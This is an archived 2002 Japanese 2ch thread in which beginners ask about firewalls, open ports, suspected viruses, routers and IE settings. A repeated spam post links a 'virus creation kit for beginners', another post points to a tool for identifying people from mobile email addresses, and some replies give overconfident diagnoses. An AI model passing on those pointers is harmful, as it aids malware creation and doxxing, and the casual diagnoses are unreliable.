win2000 Bフレなんですが、
ShieldUP!のサイトでポートをチェックすると
ポート23(TELNET)がOPENになります。
どうすりゃいいの?
>>831
TELNETはマズーすぎっ
すぐに回線切ってルータかファイアウォールで閉じて下さい!!!
とりあえずZAでも入れて↓

ZoneAlarm Part4
http://pc.2ch.net/test/read.cgi/sec/1010834959/
833名無しさん@お腹いっぱい。:02/02/04 17:18
>>832
一応ELECOMのルータとぞぬ覇両方とも使用中です。

ほかのポートもステルスぢゃなくてクローズになってしまう。
>>833
サービスでTelnet切る(もしIIS動いてたら速攻で削除)
あと、ぞぬのセキュリティレベル(?)高にしてる?
全部ステルスになるはずなんだけど・・
むしろ、ぞぬが入ってるにも関わらずtelnetが開いてることのほうが・・・
837名無しさん@お腹いっぱい。:02/02/04 17:35
>>834
コンパネから管理->サービスで確認しましたがTELNETは停止中とのこと。

>>835
ローカル 中+サーバブロックなし
インタネ 高+サーバブロック
です。

今確認したら、DSLReportsのチェックだと全ポートクローズになる。
今日再インストしたばかりなんだけどなぁwin2K
>>837
ローカル「高」ではダメ?
839名無しさん@お腹いっぱい。:02/02/04 17:43
>>838
だめです。

他のセルフチェックサイトでは、大丈夫なのに、ShieldUP!だけ反応してしまう…
840名無しさん@お腹いっぱい。:02/02/04 17:48
ノートンかバスター買おうと思ってるんですけど
どっちがオススメですか?
841 :02/02/04 18:11
一応こういうスレがある。
http://pc.2ch.net/test/read.cgi/sec/1005050509/
っても、読むのも大変だろうし、個人的にはどっちでもいいんじゃあ
ないかと思うよ。マカフィーだけはちょっと…
>>840
体験版でも入れて好きな方選びなさいってこった。
>>839
今日はShieldUP!のポートスキャン変だよ。
実際に飛んでくるの 5000 UPnP ばっかりだし。
壊れてるっぽい。前にも誤動作してたときがあった。
>>843
さっきやって普通にできたけど
845名無しさん@お腹いっぱい。:02/02/04 19:34
PC同士をP2Pで繋いだ状態で、ZoneAlarmを使って
共有フォルダへのアクセスを遮断する実験をしたのですが
どうやっても遮断できません。ネットワークの設定がおかしいのでしょうか?
それともP2Pではアクセスを遮断することができないのでしょうか?
846おしえて!:02/02/04 20:05
win2k sp2、ie6、antivirs最新定義ファイル
入れてるんですけど、
何気に、タスクマネージャーのプロセスにCSRSS.EXEを発見したんです。
調べてみると、どうもnimdaの亜種みたい。
ついでに、そのウイルスに関係があるファイルも、検索したら出てきました。
どう考えても感染してますよね?

でもウィルススキャンしても引っかからないし、
直接そのファイルをスキャンしても、
ウィルスが見つかりませんって言われるんですけど…。
どういうことでしょうか?
847843:02/02/04 20:11
>>844
すまん。勘違い。たまたま臨時で使ったISPがそういう仕様だった。
( ファイヤーウォールでポート1023以下をフィルタリング )
>>846
それは Nimdaではなくcsrss.exeはシステムファイルだからです。
849cheshire-cat:02/02/04 20:40
>>846
csrss.exeってファイル、NT系にもともと入っていなかったっけ?
今資料が手元に何も無いから、何してる実行ファイルなのかは知らんけど。
>>845
P2Pって具体的にどういうの?LANとか?それともシリアルとか?
ZAならローカルのセキュリティレベルの設定見直し

>>846
csrss.exeはWin2000では必要なプロセスです(詳しくは知らないけど)
Nimdaはそれを装ってファイル名を偽装するみたい。
ウィルススキャンで問題ないなら大丈夫でしょ
851cheshire-cat:02/02/04 20:49
Client Server Runtime Systemの略だった。
852846:02/02/04 21:00
848,849,850,851の皆々様。
どうもありがとう。

もともとあるファイルに偽装しているわけですか。
検索ページのはじめの20件ぐらいが全部NIMDA・NIMDAだったので
びっくりしてしまいました。
もっとしっかり調べれば分かった事ですね。

お騒がせしました。
>>850
P2P=PC〜LANケーブル〜PCです。
ZAのレベルを「高」にしてもだめでした。
854名無しさん@お腹いっぱい:02/02/05 01:31
超初心者なのですが、たすけて下さい。
webページを広告無しの
海外のフリースペースに作ったのですが、
ソースが書き換わってて、勝手に広告が出るので、「でてるけど?」と
メールしたら「なおしとく」みたいな感じだったので今日行ってみたら
なんかIPとうちのパソコンの中が見えてるページが開いたのです。
こわい!!と思って閉じて、また行ってみたら、もうそのページは出ません。
(ソースは書き換わったまま)
これってやばい?・・・ですよね(ゥゥゥゥ
>>854
どこのフリースペースか書け

Portlandとかf2sではないよな?
856名無しさん@お腹いっぱい。:02/02/05 02:09
クラッカーは外から画面を盗み見れるらしいが、
「もしかしたら覗かれてるかもしれない・・・」と思って、
おもむろにメモ帳を起動し、
「覗いちゃいや〜ん」とタイプしたことがあるという人はいるか?
ウイルス205種
http://www.ebcvg.com/binary.php
Empire248はBloodhoundFileString(左端の上から6番目)
未知のウイルス名称決定
このウイルス検出名はVCL_MUT.Empire.248となりました。

ほかのアンチウイルスソフトでの検出名を教えてくださいませませ。
文化放送ではありません。

http://www.symantec.com/region/jp/sarcj/data/b/bloodhound.html
http://www.symantec.com/avcenter/reference/heuristc.pdf

http://www.trendmicro.co.jp/vinfo/virusencyclo/default2.asp?m=q&virus=empire&alt=empire
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=FILESTRING.DA

初心者向けウイルス作成ソフト
http://vx.netlux.org/dat/vct.shtml
>857
日本語わかりにくい
859名無しさん@お腹いっぱい。:02/02/05 02:44
たまに(月1、2回)ファイヤウォール(ノートン)の警告が出ます。
ダイヤルアップのアイコンのなんとかexeがネットワークダイヤルアプリケーション
に接続しようとしています、とかなんとか。その都度ブロックしてるんですが・・。
ポートは137udpです。単なるスパイウェア関係でしょうか?
>>859
Q2とか国際電話につなごうとしているのでは?

スパイウエアだと思うならなぜスパイウエアチェックをしないのだ?
>>859
ポート137はNetBIOS(名前サービス)で使用される

とりあえず137〜139はしっかり閉じとこう
862859:02/02/05 03:38
レスありがとうございます。スパイウエアは昨日初めてソフトを知って
チェックしたんですが、もう一度やってみます。Q2とか目的の知れてる
ものだったらそんなに気にならないんですが・・・ウィルスも何も検出されてない
のに外部になんか発信させられてる? みたいのが気持ち悪いです。
863859:02/02/05 03:41
ちなみにADSLにしてからファイヤウォールのイベントログもすごいです。
1分おきくらいに1日中いろんなとこからブロックしてます。
864 :02/02/05 03:54
865名無しさん@お腹いっぱい。:02/02/05 06:26
2chに書き込むある人物について調べたいのですがどんなことが可能ですか?
 
866名無しさん@お腹いっぱい。:02/02/05 06:59
ISPとか会社で取られてるHTTPのログって
どーすればかわせますか?
867名無しさん@お腹いっぱい。:02/02/05 08:13
>>866
会社ならサーバ管理者に聞きましょう
868 :02/02/05 09:05
>>866
HTTPプロトコルを使わない。
インターネットに接続しないのが一番。
869名無しさん@お腹いっぱい。:02/02/05 09:56
HTTPを使わず・・・ネット接続は可能ですよね?
870 :02/02/05 10:43
そっちが、「HTTPのログ」と書いているから、
「HTTPを使わない」という答えが返ってくるのだと思うよ。
どういうログを取っているかは管理者次第だわなあ。
>>867さんが書いているように、そこの管理者でないと
ちゃんとした答えは出せないと思う。

それから、HTTPプロトコルによらないでネットワーク接続ってのは
なんぼでもあるんだけど。TCP/IP使うからHTTPってもんじゃなし、
TCP/IPがすべてでもないし。
要はどこから何をやりたいのかだなあ、「ネット接続」てのが。
メール交換か、LANで何かしたいのか、Webページ見たいのか。

871名無しさん@お腹いっぱい。:02/02/05 12:50
超初心者ですっ。先ほどブラクラ踏んだら画面いっぱいに怖いお姉さんの顔が
出てきて、そのあと再起動したらその直後からノートンさんが警告を出してきた
のですが、詳細をみたところ、アプリケーションssdpsrv.exeというのがあって
どうも、それが問題(?)らしいのですが、いろんなところを検索したら英語
のページだけで(英語わかりません・・)あとノートンウイルススキャンしてもひっかからないし。
すみません、これはウイルスなんでしょうか?ちなみにMEのIE使用です。
872名無しさん@お腹いっぱい。:02/02/05 12:58
>>871
ブラクラ!=ウイルス
ウイルスチェックをしてもひっかからない=ウイルスに感染していない
873名無しさん@お腹いっぱい。:02/02/05 13:08
>871さん
あっ!そうなのですか?では、そのssdpsrv.exeというファイル
普通に削除してしまって大丈夫ですよね。
(そうしないとノートンさんが警告30秒ごとに出してくるので)

優しい2チャンネラさん、ありがとうございましたっ。
874名無しさん@お腹いっぱい。:02/02/05 16:26
初心者です。最近常時接続にしましてファイヤーウォールソフトを
導入しようと思い色んなところを覗いて勉強しているのですが、
TinyとZoneを比べると結局
「Tinyはルール作成を苦にしない人にはシステム負荷も少なく最強だが
それが出来ない初心者はZoneでもいっこうに問題ない」
という結論でよろしいのでしょうか?
875名無しさん@お腹いっぱい。:02/02/05 16:29
>>874
初心者ならノートンかバスターを買った方がよいのでは?
877874:02/02/05 16:32
>>875
ふところ具合がとっても寂しいもので・・・(泣
それだけは除外したいと思って
ず〜〜っと昨日からこの板の過去ログとか
読みあさってるのです・・・
878名無しさん@お腹いっぱい。:02/02/05 16:33
>>874
その通り。
でもZAは簡単なぶん細かい設定ができないので、ある程度分かってきたら他のに変えるのがいいかも。
880874:02/02/05 16:42
>>879
ありがとうございます。やはりそうですかこちらの板をみてもTinyユーザーの人は
「OutpostにしてもZoneにしても結局Tinyに戻る」なんて人がとっても多いようですからね
僕はとりあえずZoneを検討してみたいと思います。
881名無しさん@お腹いっぱい。:02/02/05 17:55
CATV(グローバルIP)にぶろばんルータを噛ませてNAT変換して使っています。
クライアントPCは全てDHCPで割り振られたローカルIPアドレスですが、
黒氷かゾヌを全クライアントPCにインストールする必要ってあるでしょうか?
また、現状ではどの程度安全だと思われますか?お願いします。
882854:02/02/05 17:56
>>855
http://www.world-webspace.comです。いま自分のページいったら
www.power-space.deからクッキー要求された(←よくわからんですが)
で、http://hacker.spider.deが開いた。ドイツ語なのでわからない。
右クリックしたら何かダウンロードし始めた。怖いのでalt+ctrl+deleteで
閉じた。なんなんだろう・・・(汗
883854:02/02/05 17:58
あっ直リンしてしまった!ごめんなさい〜。
884geg:02/02/05 18:14
これはどういう意味なんですか?
Foreign Addressが*.*ってなるんですけど。

C:\WINDOWS>netstat

Active Connections

Proto Local Address Foreign Address State
TCP ●●●●●:2379 *.*������������������ ESTABLISHED
TCP ●●●●●:1436 *.*������������������ ESTABLISHED

C:\WINDOWS>
ウイルス205種
http://www.ebcvg.com/binary.php
Empire248はBloodhoundFileString(左端の上から6番目)
未知のウイルス名称決定
このウイルス検出名はVCL_MUT.Empire.248となりました。

ほかのアンチウイルスソフトでの検出名を教えてくださいませませ。
文化放送ではありません。

http://www.symantec.com/region/jp/sarcj/data/b/bloodhound.html
http://www.symantec.com/avcenter/reference/heuristc.pdf

http://www.trendmicro.co.jp/vinfo/virusencyclo/default2.asp?m=q&virus=empire&alt=empire
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=FILESTRING.DA

初心者向けウイルス作成ソフト
http://vx.netlux.org/dat/vct.shtml
>>882
なんだか分からないけど、フリースペースなら他にいっぱいあるから
そんなに怪しかったらここはやめといた方が良い。
ttp://hacker.spider.de/はいけなかった
887名無しさん@お腹いっぱい。:02/02/05 19:09
ルーターの設定について教えて下さい。
AcctonのSMC7004ABRってのを買った。
で、ネットワークのこと全然ワカランのだけど、物理的な接続や、ネットへの
接続は無事完了した。
ルーター入れる大きなメリットにセキュリティのアップとゆー点があると思ふが、
これがよく分からない。
どこかで目にしたことがあるんだけど、ルーターをカマすと、ネット対戦ゲームは
そのまんまではプレイできず、ゲーム関連のデータ(っていうのかいな)が
ルーターを通り抜けれるように設定しないとイカン、というような内容でありました。
ところが、yahooの将棋やバックギャモンは、ルーターの設定デフォルトのままで
できてしまっている。
これは、ウチのLAN内が外部から筒抜け、ってことになるのでせうか?
仮想サーバ、特殊AP,クライアントフィルタリングとかいった設定項目が
あるんだけど、この辺、触らなくてもOKなんですかNE?
説明書読むと、仮想APってのが関係ありそうなんだけど、何書いてるのか
全然ワカランです。
>>887
分からんのに買うな
889(゜▼゜*):02/02/05 20:11
>>887
そのままでプレイできないネット大戦ゲームっていうのは
UDPやICMPを使ったリアルタイム対戦ゲームなどのことです。

将棋とかバックギャモン程度では、チャットとたいして変わりません。
内側からのTCP接続だけで事足りるので、外側からの接続を受ける必要は
ありませんよ。
890名無しさん@お腹いっぱい。:02/02/05 20:17
Win98 + IE6です。
信頼済みサイトのリストを、テキストエディタで
ぱーっと編集できたら楽だなーと思ったんですが、
信頼済みサイトのURLリストってどこに保存されてるんでしょう?
リスト内の適当なURLでC:\Windowsとかを検索したけど、
見つかりませんでした。
891ピンク:02/02/05 20:28
ルーターとハブの基本的な違いを教えていただけませんか。
892887:02/02/05 20:30
>>889
なるほど、そういうことですか。
よく分かりました。
ありがとうです。

>>888
もう少しオモロイ当てはできんのか?
オレサマに相手してもらえただけでもありがたいと思え。
>>892
キモい
掲示板に誰が書き込んだかが少しでもわかる方法はありませんか?
>>895
どこの掲示板?
自分で設置したのならログ取れば分かる。
897ピンク:02/02/05 20:51
ルーターとハブの基本的な違いを教えていただけませんか。
自己レスです。
見識者の方難しい質問かと思いますが教えて下さい。
>>897
あきらかにちがうけど、しっかりした説明はむりぽです。。。
http://www.e-words.ne.jp/view.asp?ID=1476
http://www.e-words.ne.jp/view.asp?ID=1406
899cheshire-cat:02/02/05 21:01
>>897
ルーター:外につなぐための機器。
ハブ:同じセグメントの中で、都合を良くするための機器。

これじゃ簡潔すぎてダメ?
>>897
ルーターはIPアドレスを持つ、(>>897が買うような安い)ハブはIPアドレスを持たない。
901882:02/02/05 21:06
>886
そうですね・・・ありがとう。
つか>>897はどのような違いを知りたいんだ?
値段,動作原理,機能,使い勝手... 質問する技術をもうちっと習得してから聞け。
>>884
ありえない。
netstat -nを手で書き写さずにコピペしろ。
904名無しさん@お腹いっぱい。:02/02/05 21:13
ShieldsUP!で135ポートと5000ポートが開いていると言われたので、
ZoneAlarmとXPについているファイヤーウォール機能を有効にして使ったいるのですが、
開いているというのも何か気持ちが悪いので、どなたか閉じ方を教えていただけませんでしょうか。
ちなみにWindowsXP Home Editionのほうです。
905ピンク:02/02/05 21:15
色々参考になるお返事有難うございます。
皆さんどうやってそんな知識がついたのでしょう。
私はいくらセキュリティのサイトを見ても用語辞典で調べても難しくて理解
出来なく困っています。

ルーターはIPを持つなら、プロキシの機能も一部兼ね備えているという事ですか?

個人で一台のADSLモデムを使い、4台のPCを繋ぐ場合ルーターとハブでは
どちらが良いのでしょう。
もしかしてハブはサーバーを持ってないと使えないものでしょうか?
906cheshire-cat:02/02/05 21:17
>ルーターはIPを持つなら、プロキシの機能も一部兼ね備えているという事ですか?
ちゃう。

後は、何が言いたいのかわからん。はぁ、みたいな感じ。
907cheshire-cat:02/02/05 21:20
初心者スレに書くのは、真摯な気持ちの表れとして。

最近エクセプションでQ2強制接続サイトを見つけ次第、片っ端から葬ってるんだけど。対処が早くて適切な窓口ってどこ?
>>905
実際に使ってみると分かる
909ピンク:02/02/05 21:26
質問の仕方が変なのは全くの初心者だからです。
Windows9X、Meについてはそこそこの知識は持っているつもりですが、
インターネットセキュリティは無知に等しいのです。

それでは質問を変えます。
サーバーとはパソコンですか?
サーバーにはOSがありますか?
>>905
ルータが必要。個人向けに売っているルータはハブの機能も内蔵している。
ポートが足りなかったらハブを買い足してつなぐ。

>>906
あながち、違わないぞ。 http proxyでは無いが…
911cheshire-cat:02/02/05 21:31
>>909
4台のPCを繋ぐ場合ルーターとハブでは
だーかーらー。
ルーターは外に出るための道具。ハブはそいつを使ってネットワークを構築するための道具なんだってば。
912ピンク:02/02/05 21:32
>>910
よくわかりました。
理解完了です。
ずっと調べてもわからなかった事が今始めて理解できました。
本当に有難うございました。
913名無しさん@お腹いっぱい。:02/02/05 21:36
911様何度も有難うございます。
ルーターは外に出るための道具。
現在はルーターをつかて降りませんが外に出れますが?

ハブはそいつを使ってネットワークを構築するための道具なんだってば
こちらは何となく理解できました。

有難うございました。
>>909
>サーバーとはパソコンですか?
>サーバーにはOSがありますか?
こういう質問なんか懐かしい感じがする。。。
おれも最初はこういう疑問持ったよ。。
915ピンク:02/02/05 21:39
あっそうか、もしかしたら思いあたることがありました。
ルーターがない代わりにインストールしたフレッツ接続ツールが、外に出してくれているのかな?
916cheshire-cat:02/02/05 21:40
>>914
懐かしいよね、とっても。本買ってもそれほど詳細じゃなくて悩んだり。
917ピンク:02/02/05 21:41
914様
それで答えは教えていただけないでしょうか?
お願い致します。
>>915妄想中・・・
>>890←これわかりませんか?C:\もレジストリも検索したけど見つけられません。
>>919
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains
921cheshire-cat:02/02/05 21:50
>>919
状況がわからなければ、レスが付けられない。
もう寝る。
>>917
サーバ用のPCとかサーバ用のOSとかが特別にあるわけじゃない(あるけど)
つまりあなたのPCでもサーバ立てられるってことです。

>>919
今さっと調べて見つかった
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains
HKEY_USERS\(文字と数字)\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains
>>917
Altoにおけるワークステーションに代表される「概念」としてのサーバーは
OSは関与しないし、あったとしてもOSと呼べるかも定かではない。
ましてそのサーバーがパソコンと呼ぶ事はないと思われる。
対して、サービス提供をするもの「使用人」としてのサーバーは、
OS(プログラム)依存であって、おそらくユーザーの目に触れるべきOSがあるであろうし、
プログラムがOS依存である以上パソコンでもありうる。
>>920>>922
ありがとうございました!探し方が甘かったようです。
さっそく見てみます。

>>921
状況というか、IEの信頼済みサイトリストにURLひとつひとつ登録するのが面倒だったので、楽にリストを編集できないかなと思いまして。言葉足らずですいませんでした。お休みなさい。
>>923
一番正確で詳細な答え、だけど質問者には届かないような気がする
>>924
そんなに信頼していいのか と。
>>923
> Altoにおけるワークステーションに代表される「概念」としてのサーバーは
意味不明
ウイルス205種
http://www.ebcvg.com/binary.php
Empire248はBloodhoundFileString(左端の上から6番目)
未知のウイルス名称決定
このウイルス検出名はVCL_MUT.Empire.248となりました。

ほかのアンチウイルスソフトでの検出名を教えてくださいませませ。
文化放送ではありません。

http://www.symantec.com/region/jp/sarcj/data/b/bloodhound.html
http://www.symantec.com/avcenter/reference/heuristc.pdf

http://www.trendmicro.co.jp/vinfo/virusencyclo/default2.asp?m=q&virus=empire&alt=empire
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=FILESTRING.DA

初心者向けウイルス作成ソフト
http://vx.netlux.org/dat/vct.shtml
>>924
探し方が甘いつか、コンパネのインターネットオプションは殆ど
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings
の下
>>927
ワークステーションを最初に定義(提唱)したのはHPのAltoじゃなかったっけ?
Alto:Workstation=x:Serverのつもりで書いた。
間違ってたらスマソ。
931ピンク:02/02/05 22:17
923様
有難うございます。
しかしサーバーにも色々あるようですね。
用語辞典等で調べてもチンプンカンプンです。
とても理解できません。
例えば自分作ったホームページをどこかのサーバーにアップするのが
普通だと思うのですが、自分のPCでサーバーを立てれば自分のPCに人が
アクセスしてみてくれるんですか?
>>930
そりゃPARCはPalo Atlo Research CenterだがAltoとは呼ばない。
PARCで作られた世界初のワークステーションがALTO。
PARCはXEROXだ。
>>932
ええ、おっしゃる通り。HPじゃないしAltoじゃないや。スマソ。
だったら、こんなしょぼくれた酔っ払いが教える代わりにあなたが教えてあげてよ。

>>931
サーバーは「みかん」と一緒。同じ言葉でも異なった側面を持ってる。
>>931に出てくる二つのサーバーという言葉はそれぞれ異なった意味を持っている。
前者は(概念としての)サーバー、後者はサーバー(アプリケーション)をさしている。
サーバーアプリケーションを立てれば外部から見ることは可能だが、
フレッツだとか動的にIPを割り振られる場合はあまりお勧めできない。
>>931
サーバーってのは、文字通りサービスを行っているものって意味ですので
ある時はマシンを指し、ある時はソフトを指し、ある時はその両方を含めた
総合的 (あやふや) な意味で使われたりします。

一度 Pentium 100MHz を搭載したような古いマシンを調達して FreeBSD でも入れ、
Apache とか入れて実際に設定をしてみたらどうでしょうか。(私はそうしました)
'いっちょ噛み' はヘタすると、かえって混乱する事になると思いますよ。

> 自分のPCでサーバーを立てれば自分のPCに人がアクセス
環境によってですが、相手にパブリックな IP を教えれば、
そういった事ができるようになると思います。
手軽にやるなら QuickFTPD とか AnHTTPd とかなのでしょうかね。

まぁ、そもそもこういう所で聞く問題じゃありませんし、
色々と大変でしょうが頑張って下さい。
935名無しさん@お腹いっぱい。:02/02/06 03:14
変なファイル(女の人の顔が出てきてキャーっていう)をダウンロードしてしまいまして
怖いので削除したいのですが、「このファイルはWindowsで使用されてるので削除
できません」と言われました。どうしたらいいですか?怖いです たすけて
936名無しさん@お腹いっぱい。 :02/02/06 03:54
http://www.top.or.jp/~godhand/a2.html
というHPを開いたら勝手になにかダウンロードさせられました。
わけがわからないです。
いったい何なのか教えてください。
>>936
それたしかジョーク(たちの悪い)だったと思う。
ウイルス205種
http://www.ebcvg.com/binary.php
Empire248はBloodhoundFileString(左端の上から6番目)
未知のウイルス名称決定
このウイルス検出名はVCL_MUT.Empire.248となりました。

ほかのアンチウイルスソフトでの検出名を教えてくださいませませ。
文化放送ではありません。

http://www.symantec.com/region/jp/sarcj/data/b/bloodhound.html
http://www.symantec.com/avcenter/reference/heuristc.pdf

http://www.trendmicro.co.jp/vinfo/virusencyclo/default2.asp?m=q&virus=empire&alt=empire
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=FILESTRING.DA

初心者向けウイルス作成ソフト
http://vx.netlux.org/dat/vct.shtml
>>939
コピペはウィルススレだけにしろな。

☆ウィルス情報&質問 総合スレッド☆
http://pc.2ch.net/test/read.cgi/sec/1010948022/
942名無しさん@お腹いっぱい。:02/02/06 11:42
認証サービスpassportを利用する上で、具体的にどのような危険が考えられるでしょうか?
普通に運用されている場合、お店に悪意がある場合、MSがポカやった場合など、それぞれ。
>>936
今まで見る気になれなかったが初めてソースを見た。
なんだかなあ、作ってるところ想像すると怖いような哀れなような。
こういう質問を見て楽しいんだろうなあ。
>>943
たぶん最初に2chにリンク貼ったやつが作者なんだろーねー。
945名無しさん@お腹いっぱい。:02/02/06 21:54
Shields UP!でポートのチェックをしたら、113がclosedで他はステルスでした。
ネットワークのことはよく分からないので、説明の意味がよく分かりませんでした。
多分、日本語でも意味不明かも。。。
このポートをステルスにするにはどうすればいいんでしょうか?

ブロードバンドルーター+zonealarm最新版使ってまして、この辺りの設定を
すればいいと思うんですけど、、、
ルーターのセキュリティ関連はデフォルトのままで、DHCPでクライアントIPアドレス
を設定してます。
zonealarmもほぼデフォですけど、セキュリティ項目のadvancedで、ルーターの
DHCPで使うIPアドレスの範囲を、ローカルとして認識するようにしてます。
ルーターのIPアドレスもローカルとして認識するようにしています。
>>941
いや。

>>943
赤い文字だけで何もないが? 
947cheshire-cat:02/02/06 23:17
>>945
腹下して調子悪いんで、簡潔に。

ステルス→自分は存在しないよん
クローズ→ブロックしました
だもんで、ステルスの方がイイ

113はident。普通、関係ない。無視。

うち、DHCP結局使わないことになったから、それについてはコメントしたくない、ちょい自信失ったんで。
ルーターでフィルタリングすればいいじゃん、PFW以前に。
>>947
あるポートで「自分は存在しないよん」っていってても、別のポートで
「ブロックしました」だったら結局存在してるのばればれなんだよね(笑)
949 :02/02/06 23:25
くだらねぇ質問はここに書き込め Ver2.13
http://pc.2ch.net/test/read.cgi/sec/1009795619/l50
950cheshire-cat:02/02/06 23:26
あ、でも行儀の悪いプロバだと、identをフィルタリングするとメールの受信が困難になるかもしれない。
951945:02/02/06 23:28
>>947

れすサンクスです。
関係ない、ってことは、ルーターでこのポートを完全に閉じてしまっても
問題ないっていうことでしょうか?
ウチでは、外部に公開するようなサーバー、例えばWEBとかは一切立てていないし、
必要ないです。
ただ、WINXP(HOME)とWIN2000でLAN組んでるんですけど、ただの端末と
して使うけど、ネット接続のために裏で稼動しているサーバーソフトが
コイツに関係あったりすることはないでしょうかね??
そもそも、前は全部ステルスだったのに、なんでこのポートが見えるように
なったのか分からないです。
詳しくないのでアレなんですが、ポートが見えるということは、
そのポートを利用するサーバーが起動している、というコトでは
ないのでしょうか?

立て続けに沢山の質問をばしてしまいましたが、識者の方、
よろしくおねがいしますです。
952945:02/02/06 23:29
追加ですが、変わったことといえば、ルーター付属のプリンタサーバー
を使うようにしたことくらいですかね。
953cheshire-cat:02/02/06 23:38
>>948
ごもっとも。

メールの送受信の際に、「このIPアドレスは生きているのかな、ど〜れ」なんて試す奴がいるけど、そういうんじゃなければ、塞いでもOK。

Portが開いている=そのサービスが(必ず)生きている、ではない。
起動しないのに開いているポートもWin95で実験したらあったし(何かは忘れた、昔の話しだから)。

>ルーター付属のプリンタサーバー
停止して実験して、結果報告してほしい。
こういうのが積み重なって、回りまわってみんなの知識が増えるんだから。
954名無しさん@お腹いっぱい。:02/02/06 23:52
■ 初心者用質問スレッド Part7 ■
http://pc.2ch.net/test/read.cgi/sec/1013006745/l50

次スレ立てました
徐々に移行していってください
このスレは進行が遅いから990ぐらいで
新スレ立てたほうが良かったと思われ
956(゜▼゜*):02/02/07 00:00
>>953
ちなみにIRCチャットサーバやFTPサーバでも、
IDENTフィルタリングするとタイムアウトまで
待たされるやつあります。
>>955
990はちと遅いかもしんない。970ぐらいでいいか。
958945:02/02/07 00:19
プリントサーバをはずして、ローカルプリンタに戻してみました。
依然、113はclosedということで、閉まってはいるものの、丸見えです。
どうやら、プリントサーバは関係なかった模様。
どっちにしても、プリンタは外部に公開していない(つもり)ので
関係ないと思ってはいましたけど・・・

で、ルーターで113をフィルタリングしてから再度試したけど、
closedです。なんで??
ワケわからんようになってきましたです、ハイ・・・

この状態でメールチェックしたところ、問題なくメールサーバーに
アクセスできました。

皆さんの113はどうなってます?
ステルスになってる?
959cheshire-cat:02/02/07 01:18
>>958
気になって再度試したけど、ステルスだったよ。
フィルタリングの件だけど。それってルーターでブロックしたの意味で、ぞぬで解決したという訳じゃないんだから。
書き方が変だったんで誤解与えた?
現状では、113にポートスキャンかけられなければ、あるIPアドレスにWebにつないでいるNodeの存在に気づかれないということなんだから、さほど問題はないと思うよ。
それにルーターで蹴っているんだから。

原因はわからないけど、面白いケースだと。
理由がわかったら、教えて欲しい。知りたい〜

腹下して具合悪いんで、寝る。正露丸効かなくてウツ。
960名無しさん@お腹いっぱい。:02/02/07 19:13
あるURLを開いたために、「石の仮面」のような画像がアップで出るようになりました。
出現割合はランダムで、インターネットを見てたりやその他ソフトを立ち上げているときに突然現れるんです。
同じような経験がある人はいませんか?もしかしてウィルス?
かなり、キモイので対処方法を是非教えてください!!
ウイルス205種
http://www.ebcvg.com/binary.php
Empire248はBloodhoundFileString(左端の上から6番目)
未知のウイルス名称決定
このウイルス検出名はVCL_MUT.Empire.248となりました。

ほかのアンチウイルスソフトでの検出名を教えてくださいませませ。
文化放送ではありません。

http://www.symantec.com/region/jp/sarcj/data/b/bloodhound.html
http://www.symantec.com/avcenter/reference/heuristc.pdf

http://www.trendmicro.co.jp/vinfo/virusencyclo/default2.asp?m=q&virus=empire&alt=empire
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=FILESTRING.DA

初心者向けウイルス作成ソフト
http://vx.netlux.org/dat/vct.shtml
963埋め立て屋:02/02/10 22:09
■ 初心者用質問スレッド Part7 ■
http://pc.2ch.net/test/read.cgi/sec/1013006745/1-7
964眠人:02/02/15 06:25
http://muvc.net/getfile/index.htmlの

NO1 激X10 who version 1.1 携帯のメールアドレスから個人を特定するTOOL。使ったことないですが凄そう。自己防衛のために使ってください。 ダウンロード


↑GIF貼ってますけど…誰か破れますか?
■ 初心者用質問スレッド Part7 ■
http://pc.2ch.net/test/read.cgi/sec/1013006745/
966埋め立て屋:02/02/20 14:10
■ 初心者用質問スレッド Part7 ■
http://pc.2ch.net/test/read.cgi/sec/1013006745/1-7
まもなくここは 乂1000取り合戦場乂 となります。

      \∧_ヘ     / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
 ,,、,、,,, / \〇ノゝ∩ < 1000取り合戦、いくぞゴルァ!!       ,,、,、,,,
    /三√ ゚Д゚) /   \____________  ,,、,、,,,
     /三/| ゚U゚|\      ,,、,、,,,                       ,,、,、,,,
 ,,、,、,,, U (:::::::::::)  ,,、,、,,,         \オーーーーーーーッ!!/
      //三/|三|\     ∧_∧∧_∧ ∧_∧∧_∧∧_∧∧_∧
      ∪  ∪       (    )    (     )   (    )    )
 ,,、,、,,,       ,,、,、,,,  ∧_∧∧_∧∧_∧ ∧_∧∧_∧∧_∧∧_∧
      ,,、,、,,,       (    )    (    )    (    )    (    )
968名無しさん@お腹いっぱい。:02/02/25 00:42
ADSLはどこが良いのでしょうか?
安いので ヤフーBB にしようかと思うのですが
評判はどうなのでしょうか?
969 :02/02/25 01:05
>>968
評判?
知らないほうがいいかも(プ
970名無しさん@お腹いっぱい。:02/02/25 01:12
>>968
プロバイダー板逝け。
■ 初心者用質問スレッド Part7 ■
http://pc.2ch.net/test/read.cgi/sec/1013006745/
973973:02/02/25 10:19
973:Over 972 Thread
このスレッドは972を超えました。
もう書けないので、新しいスレッドを立ててくださいです。。。



うそつき!書けるもん!
975埋め立て屋:02/02/26 05:49
■ 初心者用質問スレッド Part7 ■
http://pc.2ch.net/test/read.cgi/sec/1013006745/
976埋め立て屋:02/02/26 05:49
■ 初心者用質問スレッド Part7 ■
http://pc.2ch.net/test/read.cgi/sec/1013006745/
■ 初心者用質問スレッド Part7 ■
http://pc.2ch.net/test/read.cgi/sec/1013006745/
977埋め立て屋:02/02/26 05:49
■ 初心者用質問スレッド Part7 ■
http://pc.2ch.net/test/read.cgi/sec/1013006745/
■ 初心者用質問スレッド Part7 ■
http://pc.2ch.net/test/read.cgi/sec/1013006745/
■ 初心者用質問スレッド Part7 ■
http://pc.2ch.net/test/read.cgi/sec/1013006745/
978埋め立て屋:02/02/26 05:49
■ 初心者用質問スレッド Part7 ■
http://pc.2ch.net/test/read.cgi/sec/1013006745/
■ 初心者用質問スレッド Part7 ■
